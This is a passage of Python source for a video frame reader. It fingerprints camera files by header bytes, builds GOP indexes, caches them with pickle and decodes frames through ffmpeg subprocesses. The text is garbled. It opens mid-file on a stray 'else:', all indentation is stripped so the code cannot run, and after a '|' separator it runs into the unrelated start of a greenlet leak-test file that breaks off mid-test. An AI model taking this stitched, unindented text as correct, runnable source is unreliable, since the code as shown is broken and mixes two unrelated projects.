from io import BytesIO as StringIO
else:
import Queue as queue
import cPickle as pickle
from cStringIO import StringIO
import subprocess
from aenum import Enum
from lru import LRU
from functools import wraps
from concurrent.futures import ThreadPoolExecutor, as_completed
from tools.lib.cache import cache_path_for_file_path
from tools.lib.exceptions import DataUnreadableError
try:
from xx.chffr.lib.filereader import FileReader
except ImportError:
from tools.lib.filereader import FileReader
from tools.lib.file_helpers import atomic_write_in_dir
from tools.lib.mkvparse import mkvindex
from tools.lib.route import Route
H264_SLICE_P = 0
H264_SLICE_B = 1
H264_SLICE_I = 2
HEVC_SLICE_B = 0
HEVC_SLICE_P = 1
HEVC_SLICE_I = 2
SLICE_I = 2 # hevc and h264 are the same :)
class FrameType(Enum):
raw = 1
h265_stream = 2
h264_mp4 = 3
h264_pstream = 4
ffv1_mkv = 5
ffvhuff_mkv = 6
def fingerprint_video(fn):
with FileReader(fn) as f:
header = f.read(4)
if len(header) == 0:
raise DataUnreadableError("%s is empty" % fn)
elif header == b"\x00\xc0\x12\x00":
return FrameType.raw
elif header == b"\x00\x00\x00\x01":
if 'hevc' in fn:
return FrameType.h265_stream
elif os.path.basename(fn) in ("camera", "acamera"):
return FrameType.h264_pstream
else:
raise NotImplementedError(fn)
elif header == b"\x00\x00\x00\x1c":
return FrameType.h264_mp4
elif header == b"\x1a\x45\xdf\xa3":
return FrameType.ffv1_mkv
else:
raise NotImplementedError(fn)
def ffprobe(fn, fmt=None):
cmd = ["ffprobe",
"-v", "quiet",
"-print_format", "json",
"-show_format", "-show_streams"]
if fmt:
cmd += ["-format", fmt]
cmd += [fn]
try:
ffprobe_output = subprocess.check_output(cmd)
except subprocess.CalledProcessError as e:
raise DataUnreadableError(fn)
return json.loads(ffprobe_output)
def vidindex(fn, typ):
vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex")
vidindex = os.path.join(vidindex_dir, "vidindex")
subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null","w"))
with tempfile.NamedTemporaryFile() as prefix_f, \
tempfile.NamedTemporaryFile() as index_f:
try:
subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name])
except subprocess.CalledProcessError as e:
raise DataUnreadableError("vidindex failed on file %s" % fn)
with open(index_f.name, "rb") as f:
index = f.read()
with open(prefix_f.name, "rb") as f:
prefix = f.read()
index = np.frombuffer(index, np.uint32).reshape(-1, 2)
assert index[-1, 0] == 0xFFFFFFFF
assert index[-1, 1] == os.path.getsize(fn)
return index, prefix
def cache_fn(func):
@wraps(func)
def cache_inner(fn, *args, **kwargs):
cache_prefix = kwargs.pop('cache_prefix', None)
cache_path = cache_path_for_file_path(fn, cache_prefix)
if cache_path and os.path.exists(cache_path):
with open(cache_path, "rb") as cache_file:
cache_value = pickle.load(cache_file)
else:
cache_value = func(fn, *args, **kwargs)
if cache_path:
with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
pickle.dump(cache_value, cache_file, -1)
return cache_value
return cache_inner
@cache_fn
def index_stream(fn, typ):
assert typ in ("hevc", "h264")
with FileReader(fn) as f:
assert os.path.exists(f.name), fn
index, prefix = vidindex(f.name, typ)
probe = ffprobe(f.name, typ)
return {
'index': index,
'global_prefix': prefix,
'probe': probe
}
@cache_fn
def index_mp4(fn):
with FileReader(fn) as f:
return vidindex_mp4(f.name)
@cache_fn
def index_mkv(fn):
with FileReader(fn) as f:
probe = ffprobe(f.name, "matroska")
with open(f.name, "rb") as d_f:
config_record, index = mkvindex.mkvindex(d_f)
return {
'probe': probe,
'config_record': config_record,
'index': index
}
def index_videos(camera_paths, cache_prefix=None):
"""Requires that paths in camera_paths are contiguous and of the same type."""
if len(camera_paths) < 1:
raise ValueError("must provide at least one video to index")
frame_type = fingerprint_video(camera_paths[0])
if frame_type == FrameType.h264_pstream:
index_pstream(camera_paths, "h264", cache_prefix)
else:
for fn in camera_paths:
index_video(fn, frame_type, cache_prefix)
def index_video(fn, frame_type=None, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if os.path.exists(cache_path):
return
if frame_type is None:
frame_type = fingerprint_video(fn[0])
if frame_type == FrameType.h264_pstream:
#hack: try to index the whole route now
route = Route.from_file_path(fn)
camera_paths = route.camera_paths()
if fn not in camera_paths:
raise DataUnreadableError("Not a contiguous route camera file: {}".format(fn))
print("no pstream cache for %s, indexing route %s now" % (fn, route.name))
index_pstream(route.camera_paths(), "h264", cache_prefix)
elif frame_type == FrameType.h265_stream:
index_stream(fn, "hevc", cache_prefix=cache_prefix)
elif frame_type == FrameType.h264_mp4:
index_mp4(fn, cache_prefix=cache_prefix)
def get_video_index(fn, frame_type, cache_prefix=None):
cache_path = cache_path_for_file_path(fn, cache_prefix)
if not os.path.exists(cache_path):
index_video(fn, frame_type, cache_prefix)
if not os.path.exists(cache_path):
return None
with open(cache_path, "rb") as cache_file:
return pickle.load(cache_file)
def pstream_predecompress(fns, probe, indexes, global_prefix, cache_prefix, multithreaded=False):
assert len(fns) == len(indexes)
out_fns = [cache_path_for_file_path(fn, cache_prefix, extension=".predecom.mkv") for fn in fns]
out_exists = map(os.path.exists, out_fns)
if all(out_exists):
return
w = probe['streams'][0]['width']
h = probe['streams'][0]['height']
frame_size = w*h*3/2 # yuv420p
decompress_proc = subprocess.Popen(
["ffmpeg",
"-threads", "0" if multithreaded else "1",
"-vsync", "0",
"-f", "h264",
"-i", "pipe:0",
"-threads", "0" if multithreaded else "1",
"-f", "rawvideo",
"-pix_fmt", "yuv420p",
"pipe:1"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb"))
def write_thread():
for fn in fns:
with FileReader(fn) as f:
decompress_proc.stdin.write(f.read())
decompress_proc.stdin.close()
def read_frame():
frame = None
try:
frame = decompress_proc.stdout.read(frame_size)
except (IOError, ValueError):
pass
if frame is None or frame == "" or len(frame) != frame_size:
raise DataUnreadableError("pre-decompression failed for %s" % fn)
return frame
t = threading.Thread(target=write_thread)
t.daemon = True
t.start()
try:
for fn, out_fn, out_exist, index in zip(fns, out_fns, out_exists, indexes):
if out_exist:
for fi in range(index.shape[0]-1):
read_frame()
continue
with atomic_write_in_dir(out_fn, mode="w+b", overwrite=True) as out_tmp:
compress_proc = subprocess.Popen(
["ffmpeg",
"-threads", "0" if multithreaded else "1",
"-y",
"-vsync", "0",
"-f", "rawvideo",
"-pix_fmt", "yuv420p",
"-s", "%dx%d" % (w, h),
"-i", "pipe:0",
"-threads", "0" if multithreaded else "1",
"-f", "matroska",
"-vcodec", "ffv1",
"-g", "0",
out_tmp.name],
stdin=subprocess.PIPE, stderr=open("/dev/null", "wb"))
try:
for fi in range(index.shape[0]-1):
frame = read_frame()
compress_proc.stdin.write(frame)
compress_proc.stdin.close()
except:
compress_proc.kill()
raise
assert compress_proc.wait() == 0
cache_path = cache_path_for_file_path(fn, cache_prefix)
with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
pickle.dump({
'predecom': os.path.basename(out_fn),
'index': index,
'probe': probe,
'global_prefix': global_prefix,
}, cache_file, -1)
except:
decompress_proc.kill()
raise
finally:
t.join()
rc = decompress_proc.wait()
if rc != 0:
raise DataUnreadableError(fns[0])
def index_pstream(fns, typ, cache_prefix=None):
if typ != "h264":
raise NotImplementedError(typ)
if not fns:
raise DataUnreadableError("chffr h264 requires contiguous files")
out_fns = [cache_path_for_file_path(fn, cache_prefix) for fn in fns]
out_exists = map(os.path.exists, out_fns)
if all(out_exists): return
# load existing index files to avoid re-doing work
existing_indexes = []
for out_fn, exists in zip(out_fns, out_exists):
existing = None
if exists:
with open(out_fn, "rb") as cache_file:
existing = pickle.load(cache_file)
existing_indexes.append(existing)
# probe the first file
if existing_indexes[0]:
probe = existing_indexes[0]['probe']
else:
with FileReader(fns[0]) as f:
probe = ffprobe(f.name, typ)
global_prefix = None
# get the video index of all the segments in this stream
indexes = []
for i, fn in enumerate(fns):
if existing_indexes[i]:
index = existing_indexes[i]['index']
prefix = existing_indexes[i]['global_prefix']
else:
with FileReader(fn) as f:
index, prefix = vidindex(f.name, typ)
if i == 0:
# assert prefix
if not prefix:
raise DataUnreadableError("vidindex failed for %s" % fn)
global_prefix = prefix
indexes.append(index)
assert global_prefix
if np.sum(indexes[0][:, 0] == H264_SLICE_I) <= 1:
print("pstream %s is unseekable. pre-decompressing all the segments..." % (fns[0]))
pstream_predecompress(fns, probe, indexes, global_prefix, cache_prefix)
return
# generate what's required to make each segment self-contained
# (the partial GOP from the end of each segments are put asside to add
# to the start of the following segment)
prefix_data = ["" for _ in fns]
prefix_index = [[] for _ in fns]
for i in range(len(fns)-1):
if indexes[i+1][0, 0] == H264_SLICE_I and indexes[i+1][0, 1] <= 1:
# next file happens to start with a i-frame, dont need use this file's end
continue
index = indexes[i]
if i == 0 and np.sum(index[:, 0] == H264_SLICE_I) <= 1:
raise NotImplementedError("No I-frames in pstream.")
# find the last GOP in the index
frame_b = len(index)-1
while frame_b > 0 and index[frame_b, 0] != H264_SLICE_I:
frame_b -= 1
assert frame_b >= 0
assert index[frame_b, 0] == H264_SLICE_I
end_len = len(index)-frame_b
with FileReader(fns[i]) as vid:
vid.seek(index[frame_b, 1])
end_data = vid.read()
prefix_data[i+1] = end_data
prefix_index[i+1] = index[frame_b:-1]
# indexes[i] = index[:frame_b]
for i, fn in enumerate(fns):
cache_path = out_fns[i]
if os.path.exists(cache_path):
continue
segment_index = {
'index': indexes[i],
'global_prefix': global_prefix,
'probe': probe,
'prefix_frame_data': prefix_data[i], # data to prefix the first GOP with
'num_prefix_frames': len(prefix_index[i]), # number of frames to skip in the first GOP
}
with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
pickle.dump(segment_index, cache_file, -1)
def read_file_check_size(f, sz, cookie):
buff = bytearray(sz)
bytes_read = f.readinto(buff)
assert bytes_read == sz, (bytes_read, sz)
return buff
import signal
import ctypes
def _set_pdeathsig(sig=signal.SIGTERM):
def f():
libc = ctypes.CDLL('libc.so.6')
return libc.prctl(1, sig)
return f
def vidindex_mp4(fn):
try:
xmls = subprocess.check_output(["MP4Box", fn, "-diso", "-out", "/dev/stdout"])
except subprocess.CalledProcessError as e:
raise DataUnreadableError(fn)
tree = ET.fromstring(xmls)
def parse_content(s):
assert s.startswith("data:application/octet-string,")
return s[len("data:application/octet-string,"):].decode("hex")
avc_element = tree.find(".//AVCSampleEntryBox")
width = int(avc_element.attrib['Width'])
height = int(avc_element.attrib['Height'])
sps_element = avc_element.find(".//AVCDecoderConfigurationRecord/SequenceParameterSet")
pps_element = avc_element.find(".//AVCDecoderConfigurationRecord/PictureParameterSet")
sps = parse_content(sps_element.attrib['content'])
pps = parse_content(pps_element.attrib['content'])
media_header = tree.find("MovieBox/TrackBox/MediaBox/MediaHeaderBox")
time_scale = int(media_header.attrib['TimeScale'])
sample_sizes = [
int(entry.attrib['Size']) for entry in tree.findall(
"MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/SampleSizeBox/SampleSizeEntry")
]
sample_dependency = [
entry.attrib['dependsOnOther'] == "yes" for entry in tree.findall(
"MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/SampleDependencyTypeBox/SampleDependencyEntry")
]
assert len(sample_sizes) == len(sample_dependency)
chunk_offsets = [
int(entry.attrib['offset']) for entry in tree.findall(
"MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/ChunkOffsetBox/ChunkEntry")
]
sample_chunk_table = [
(int(entry.attrib['FirstChunk'])-1, int(entry.attrib['SamplesPerChunk'])) for entry in tree.findall(
"MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/SampleToChunkBox/SampleToChunkEntry")
]
sample_offsets = [None for _ in sample_sizes]
sample_i = 0
for i, (first_chunk, samples_per_chunk) in enumerate(sample_chunk_table):
if i == len(sample_chunk_table)-1:
last_chunk = len(chunk_offsets)-1
else:
last_chunk = sample_chunk_table[i+1][0]-1
for k in range(first_chunk, last_chunk+1):
sample_offset = chunk_offsets[k]
for _ in range(samples_per_chunk):
sample_offsets[sample_i] = sample_offset
sample_offset += sample_sizes[sample_i]
sample_i += 1
assert sample_i == len(sample_sizes)
pts_offset_table = [
( int(entry.attrib['CompositionOffset']), int(entry.attrib['SampleCount']) ) for entry in tree.findall(
"MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/CompositionOffsetBox/CompositionOffsetEntry")
]
sample_pts_offset = [0 for _ in sample_sizes]
sample_i = 0
for dt, count in pts_offset_table:
for _ in range(count):
sample_pts_offset[sample_i] = dt
sample_i += 1
sample_time_table = [
( int(entry.attrib['SampleDelta']), int(entry.attrib['SampleCount']) ) for entry in tree.findall(
"MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/TimeToSampleBox/TimeToSampleEntry")
]
sample_time = [None for _ in sample_sizes]
cur_ts = 0
sample_i = 0
for dt, count in sample_time_table:
for _ in range(count):
sample_time[sample_i] = (cur_ts + sample_pts_offset[sample_i]) * 1000 / time_scale
cur_ts += dt
sample_i += 1
sample_time.sort() # because we ony decode GOPs in PTS order
return {
'width': width,
'height': height,
'sample_offsets': sample_offsets,
'sample_sizes': sample_sizes,
'sample_dependency': sample_dependency,
'sample_time': sample_time,
'sps': sps,
'pps': pps
}
class BaseFrameReader(object):
# properties: frame_type, frame_count, w, h
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def close(self):
pass
def get(self, num, count=1, pix_fmt="yuv420p"):
raise NotImplementedError
def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, multithreaded=True):
frame_type = fingerprint_video(fn)
if frame_type == FrameType.raw:
return RawFrameReader(fn)
elif frame_type in (FrameType.h265_stream, FrameType.h264_pstream):
index_data = get_video_index(fn, frame_type, cache_prefix)
if index_data is not None and "predecom" in index_data:
cache_path = cache_path_for_file_path(fn, cache_prefix)
return MKVFrameReader(
os.path.join(os.path.dirname(cache_path), index_data["predecom"]))
else:
return StreamFrameReader(fn, frame_type, index_data,
readahead=readahead, readbehind=readbehind, multithreaded=multithreaded)
elif frame_type == FrameType.h264_mp4:
return MP4FrameReader(fn, readahead=readahead)
elif frame_type == FrameType.ffv1_mkv:
return MKVFrameReader(fn)
else:
raise NotImplementedError(frame_type)
def rgb24toyuv420(rgb):
yuv_from_rgb = np.array([[ 0.299 , 0.587 , 0.114 ],
[-0.14714119, -0.28886916, 0.43601035 ],
[ 0.61497538, -0.51496512, -0.10001026 ]])
img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape)
y_len = img.shape[0] * img.shape[1]
uv_len = y_len / 4
ys = img[:, :, 0]
us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128
vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128
yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype)
yuv420[:y_len] = ys.reshape(-1)
yuv420[y_len:y_len + uv_len] = us.reshape(-1)
yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1)
return yuv420.clip(0,255).astype('uint8')
class RawData(object):
def __init__(self, f):
self.f = _io.FileIO(f, 'rb')
self.lenn = struct.unpack("I", self.f.read(4))[0]
self.count = os.path.getsize(f) / (self.lenn+4)
def read(self, i):
self.f.seek((self.lenn+4)*i + 4)
return self.f.read(self.lenn)
class RawFrameReader(BaseFrameReader):
def __init__(self, fn):
# raw camera
self.fn = fn
self.frame_type = FrameType.raw
self.rawfile = RawData(self.fn)
self.frame_count = self.rawfile.count
self.w, self.h = 640, 480
def load_and_debayer(self, img):
img = np.frombuffer(img, dtype='uint8').reshape(960, 1280)
cimg = np.dstack([img[0::2, 1::2], (
(img[0::2, 0::2].astype("uint16") + img[1::2, 1::2].astype("uint16"))
>> 1).astype("uint8"), img[1::2, 0::2]])
return cimg
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
assert num+count <= self.frame_count
if pix_fmt not in ("yuv420p", "rgb24"):
raise ValueError("Unsupported pixel format %r" % pix_fmt)
app = []
for i in range(num, num+count):
dat = self.rawfile.read(i)
rgb_dat = self.load_and_debayer(dat)
if pix_fmt == "rgb24":
app.append(rgb_dat)
elif pix_fmt == "yuv420p":
app.append(rgb24toyuv420(rgb_dat))
else:
raise NotImplementedError
return app
def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt, multithreaded=False):
# using a tempfile is much faster than proc.communicate for some reason
with tempfile.TemporaryFile() as tmpf:
tmpf.write(rawdat)
tmpf.seek(0)
proc = subprocess.Popen(
["ffmpeg",
"-threads", "0" if multithreaded else "1",
"-vsync", "0",
"-f", vid_fmt,
"-flags2", "showall",
"-i", "pipe:0",
"-threads", "0" if multithreaded else "1",
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
stdin=tmpf, stdout=subprocess.PIPE, stderr=open("/dev/null"))
# dat = proc.communicate()[0]
dat = proc.stdout.read()
if proc.wait() != 0:
raise DataUnreadableError("ffmpeg failed")
if pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, h, w, 3)
elif pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, (h*w*3//2))
elif pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape(-1, 3, h, w)
else:
raise NotImplementedError
return ret
class VideoStreamDecompressor(object):
def __init__(self, vid_fmt, w, h, pix_fmt, multithreaded=False):
self.vid_fmt = vid_fmt
self.w = w
self.h = h
self.pix_fmt = pix_fmt
if pix_fmt == "yuv420p":
self.out_size = w*h*3//2 # yuv420p
elif pix_fmt in ("rgb24", "yuv444p"):
self.out_size = w*h*3
else:
raise NotImplementedError
self.out_q = queue.Queue()
self.proc = subprocess.Popen(
["ffmpeg",
"-threads", "0" if multithreaded else "1",
# "-avioflags", "direct",
"-analyzeduration", "0",
"-probesize", "32",
"-flush_packets", "0",
# "-fflags", "nobuffer",
"-vsync", "0",
"-f", vid_fmt,
"-i", "pipe:0",
"-threads", "0" if multithreaded else "1",
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"pipe:1"],
stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb"))
def read_thread():
while True:
r = self.proc.stdout.read(self.out_size)
if len(r) == 0:
break
assert len(r) == self.out_size
self.out_q.put(r)
self.t = threading.Thread(target=read_thread)
self.t.daemon = True
self.t.start()
def __enter__(self):
return self
def __exit__(self, *args):
self.close()
def write(self, rawdat):
self.proc.stdin.write(rawdat)
self.proc.stdin.flush()
def read(self):
dat = self.out_q.get(block=True)
if self.pix_fmt == "rgb24":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((self.h, self.w, 3))
elif self.pix_fmt == "yuv420p":
ret = np.frombuffer(dat, dtype=np.uint8)
elif self.pix_fmt == "yuv444p":
ret = np.frombuffer(dat, dtype=np.uint8).reshape((3, self.h, self.w))
else:
assert False
return ret
def eos(self):
self.proc.stdin.close()
def close(self):
self.proc.stdin.close()
self.t.join()
self.proc.wait()
assert self.proc.wait() == 0
class MKVFrameReader(BaseFrameReader):
def __init__(self, fn):
self.fn = fn
#print("MKVFrameReader", fn)
index_data = index_mkv(fn)
stream = index_data['probe']['streams'][0]
self.w = stream['width']
self.h = stream['height']
if stream['codec_name'] == 'ffv1':
self.frame_type = FrameType.ffv1_mkv
elif stream['codec_name'] == 'ffvhuff':
self.frame_type = FrameType.ffvhuff_mkv
else:
raise NotImplementedError
self.config_record = index_data['config_record']
self.index = index_data['index']
self.frame_count = len(self.index)
def get(self, num, count=1, pix_fmt="yuv420p"):
assert 0 < num+count <= self.frame_count
frame_dats = []
with FileReader(self.fn) as f:
for i in range(num, num+count):
pos, length, _ = self.index[i]
f.seek(pos)
frame_dats.append(f.read(length))
of = StringIO()
mkvindex.simple_gen(of, self.config_record, self.w, self.h, frame_dats)
r = decompress_video_data(of.getvalue(), "matroska", self.w, self.h, pix_fmt)
assert len(r) == count
return r
class GOPReader(object):
def get_gop(self, num):
# returns (start_frame_num, num_frames, frames_to_skip, gop_data)
raise NotImplementedError
class DoNothingContextManager(object):
def __enter__(self): return self
def __exit__(*x): pass
class GOPFrameReader(BaseFrameReader):
#FrameReader with caching and readahead for formats that are group-of-picture based
def __init__(self, readahead=False, readbehind=False, multithreaded=True):
self.open_ = True
self.multithreaded = multithreaded
self.readahead = readahead
self.readbehind = readbehind
self.frame_cache = LRU(64)
if self.readahead:
self.cache_lock = threading.RLock()
self.readahead_last = None
self.readahead_len = 30
self.readahead_c = threading.Condition()
self.readahead_thread = threading.Thread(target=self._readahead_thread)
self.readahead_thread.daemon = True
self.readahead_thread.start()
else:
self.cache_lock = DoNothingContextManager()
def close(self):
if not self.open_:
return
self.open_ = False
if self.readahead:
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
self.readahead_thread.join()
def _readahead_thread(self):
while True:
self.readahead_c.acquire()
try:
if not self.open_:
break
self.readahead_c.wait()
finally:
self.readahead_c.release()
if not self.open_:
break
assert self.readahead_last
num, pix_fmt = self.readahead_last
if self.readbehind:
for k in range(num-1, max(0, num-self.readahead_len), -1):
self._get_one(k, pix_fmt)
else:
for k in range(num, min(self.frame_count, num+self.readahead_len)):
self._get_one(k, pix_fmt)
def _get_one(self, num, pix_fmt):
assert num < self.frame_count
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
with self.cache_lock:
if (num, pix_fmt) in self.frame_cache:
return self.frame_cache[(num, pix_fmt)]
frame_b, num_frames, skip_frames, rawdat = self.get_gop(num)
ret = decompress_video_data(rawdat, self.vid_fmt, self.w, self.h, pix_fmt,
multithreaded=self.multithreaded)
ret = ret[skip_frames:]
assert ret.shape[0] == num_frames
for i in range(ret.shape[0]):
self.frame_cache[(frame_b+i, pix_fmt)] = ret[i]
return self.frame_cache[(num, pix_fmt)]
def get(self, num, count=1, pix_fmt="yuv420p"):
assert self.frame_count is not None
if num + count > self.frame_count:
raise ValueError("{} > {}".format(num + count, self.frame_count))
if pix_fmt not in ("yuv420p", "rgb24", "yuv444p"):
raise ValueError("Unsupported pixel format %r" % pix_fmt)
ret = [self._get_one(num + i, pix_fmt) for i in range(count)]
if self.readahead:
self.readahead_last = (num+count, pix_fmt)
self.readahead_c.acquire()
self.readahead_c.notify()
self.readahead_c.release()
return ret
class MP4GOPReader(GOPReader):
def __init__(self, fn):
self.fn = fn
self.frame_type = FrameType.h264_mp4
self.index = index_mp4(fn)
self.w = self.index['width']
self.h = self.index['height']
self.sample_sizes = self.index['sample_sizes']
self.sample_offsets = self.index['sample_offsets']
self.sample_dependency = self.index['sample_dependency']
self.vid_fmt = "h264"
self.frame_count = len(self.sample_sizes)
self.prefix = "\x00\x00\x00\x01"+self.index['sps']+"\x00\x00\x00\x01"+self.index['pps']
def _lookup_gop(self, num):
frame_b = num
while frame_b > 0 and self.sample_dependency[frame_b]:
frame_b -= 1
frame_e = num+1
while frame_e < (len(self.sample_dependency)-1) and self.sample_dependency[frame_e]:
frame_e += 1
return (frame_b, frame_e)
def get_gop(self, num):
frame_b, frame_e = self._lookup_gop(num)
assert frame_b <= num < frame_e
num_frames = frame_e-frame_b
with FileReader(self.fn) as f:
rawdat = []
sample_i = frame_b
while sample_i < frame_e:
size = self.sample_sizes[sample_i]
start_offset = self.sample_offsets[sample_i]
# try to read contiguously because a read could actually be a http request
sample_i += 1
while sample_i < frame_e and size < 10000000 and start_offset+size == self.sample_offsets[sample_i]:
size += self.sample_sizes[sample_i]
sample_i += 1
f.seek(start_offset)
sampledat = f.read(size)
# read length-prefixed NALUs and output in Annex-B
i = 0
while i < len(sampledat):
nal_len, = struct.unpack(">I", sampledat[i:i+4])
rawdat.append("\x00\x00\x00\x01"+sampledat[i+4:i+4+nal_len])
i = i+4+nal_len
assert i == len(sampledat)
rawdat = self.prefix+''.join(rawdat)
return frame_b, num_frames, 0, rawdat
class MP4FrameReader(MP4GOPReader, GOPFrameReader):
def __init__(self, fn, readahead=False):
MP4GOPReader.__init__(self, fn)
GOPFrameReader.__init__(self, readahead)
class StreamGOPReader(GOPReader):
def __init__(self, fn, frame_type, index_data):
self.fn = fn
self.frame_type = frame_type
self.frame_count = None
self.w, self.h = None, None
self.prefix = None
self.index = None
self.index = index_data['index']
self.prefix = index_data['global_prefix']
probe = index_data['probe']
if self.frame_type == FrameType.h265_stream:
self.prefix_frame_data = None
self.num_prefix_frames = 0
self.vid_fmt = "hevc"
elif self.frame_type == FrameType.h264_pstream:
self.prefix_frame_data = index_data['prefix_frame_data']
self.num_prefix_frames = index_data['num_prefix_frames']
self.vid_fmt = "h264"
i = 0
while i < self.index.shape[0] and self.index[i, 0] != SLICE_I:
i += 1
self.first_iframe = i
if self.frame_type == FrameType.h265_stream:
assert self.first_iframe == 0
self.frame_count = len(self.index)-1
self.w = probe['streams'][0]['width']
self.h = probe['streams'][0]['height']
def _lookup_gop(self, num):
frame_b = num
while frame_b > 0 and self.index[frame_b, 0] != SLICE_I:
frame_b -= 1
frame_e = num+1
while frame_e < (len(self.index)-1) and self.index[frame_e, 0] != SLICE_I:
frame_e += 1
offset_b = self.index[frame_b, 1]
offset_e = self.index[frame_e, 1]
return (frame_b, frame_e, offset_b, offset_e)
def get_gop(self, num):
frame_b, frame_e, offset_b, offset_e = self._lookup_gop(num)
assert frame_b <= num < frame_e
num_frames = frame_e-frame_b
with FileReader(self.fn) as f:
f.seek(offset_b)
rawdat = f.read(offset_e-offset_b)
if num < self.first_iframe:
assert self.prefix_frame_data
rawdat = self.prefix_frame_data + rawdat
rawdat = self.prefix + rawdat
skip_frames = 0
if num < self.first_iframe:
skip_frames = self.num_prefix_frames
return frame_b, num_frames, skip_frames, rawdat
class StreamFrameReader(StreamGOPReader, GOPFrameReader):
def __init__(self, fn, frame_type, index_data, readahead=False, readbehind=False, multithreaded=False):
StreamGOPReader.__init__(self, fn, frame_type, index_data)
GOPFrameReader.__init__(self, readahead, readbehind, multithreaded)
def GOPFrameIterator(gop_reader, pix_fmt, multithreaded=True):
# this is really ugly. ill think about how to refactor it when i can think good
IN_FLIGHT_GOPS = 6 # should be enough that the stream decompressor starts returning data
with VideoStreamDecompressor(
gop_reader.vid_fmt, gop_reader.w, gop_reader.h, pix_fmt, multithreaded) as dec:
read_work = []
def readthing():
# print read_work, dec.out_q.qsize()
outf = dec.read()
read_thing = read_work[0]
if read_thing[0] > 0:
read_thing[0] -= 1
else:
assert read_thing[1] > 0
yield outf
read_thing[1] -= 1
if read_thing[1] == 0:
read_work.pop(0)
i = 0
while i < gop_reader.frame_count:
frame_b, num_frames, skip_frames, gop_data = gop_reader.get_gop(i)
dec.write(gop_data)
i += num_frames
read_work.append([skip_frames, num_frames])
while len(read_work) >= IN_FLIGHT_GOPS:
for v in readthing(): yield v
dec.eos()
while read_work:
for v in readthing(): yield v
def FrameIterator(fn, pix_fmt, **kwargs):
fr = FrameReader(fn, **kwargs)
if isinstance(fr, GOPReader):
for v in GOPFrameIterator(fr, pix_fmt, kwargs.get("multithreaded", True)): yield v
else:
for i in range(fr.frame_count):
yield fr.get(i, pix_fmt=pix_fmt)[0]
def FrameWriter(ofn, frames, vid_fmt=FrameType.ffvhuff_mkv, pix_fmt="rgb24", framerate=20, multithreaded=False):
if pix_fmt not in ("rgb24", "yuv420p"):
raise NotImplementedError
if vid_fmt == FrameType.ffv1_mkv:
assert ofn.endswith(".mkv")
vcodec = "ffv1"
elif vid_fmt == FrameType.ffvhuff_mkv:
assert ofn.endswith(".mkv")
vcodec = "ffvhuff"
else:
raise NotImplementedError
frame_gen = iter(frames)
first_frame = next(frame_gen)
# assert len(frames) > 1
if pix_fmt == "rgb24":
h, w = first_frame.shape[:2]
elif pix_fmt == "yuv420p":
w = first_frame.shape[1]
h = 2*first_frame.shape[0]//3
else:
raise NotImplementedError
compress_proc = subprocess.Popen(
["ffmpeg",
"-threads", "0" if multithreaded else "1",
"-y",
"-framerate", str(framerate),
"-vsync", "0",
"-f", "rawvideo",
"-pix_fmt", pix_fmt,
"-s", "%dx%d" % (w, h),
"-i", "pipe:0",
"-threads", "0" if multithreaded else "1",
"-f", "matroska",
"-vcodec", vcodec,
"-g", "0",
ofn],
stdin=subprocess.PIPE, stderr=open("/dev/null", "wb"))
try:
compress_proc.stdin.write(first_frame.tobytes())
for frame in frame_gen:
compress_proc.stdin.write(frame.tobytes())
compress_proc.stdin.close()
except:
compress_proc.kill()
raise
assert compress_proc.wait() == 0
if __name__ == "__main__":
fn = "cd:/1c79456b0c90f15a/2017-05-10--08-17-00/2/fcamera.hevc"
f = FrameReader(fn)
# print f.get(0, 1).shape
# print f.get(15, 1).shape
for v in GOPFrameIterator(f, "yuv420p"):
print(v)
|
test_leaks.py | """
Testing scenarios that may have leaked.
"""
from __future__ import print_function, absolute_import, division
import sys
import gc
import time
import weakref
import threading
import greenlet
from . import TestCase
from .leakcheck import fails_leakcheck
try:
from sys import intern
except ImportError:
# Python 2
pass
assert greenlet.GREENLET_USE_GC # Option to disable this was removed in 1.0
class HasFinalizerTracksInstances(object):
EXTANT_INSTANCES = set()
def __init__(self, msg):
self.msg = intern(msg)
self.EXTANT_INSTANCES.add(id(self))
def __del__(self):
self.EXTANT_INSTANCES.remove(id(self))
def __repr__(self):
return "<HasFinalizerTracksInstances at 0x%x %r>" % (
id(self), self.msg
)
@classmethod
def reset(cls):
cls.EXTANT_INSTANCES.clear()
class TestLeaks(TestCase):
def test_arg_refs(self):
args = ('a', 'b', 'c')
refcount_before = sys.getrefcount(args)
# pylint:disable=unnecessary-lambda
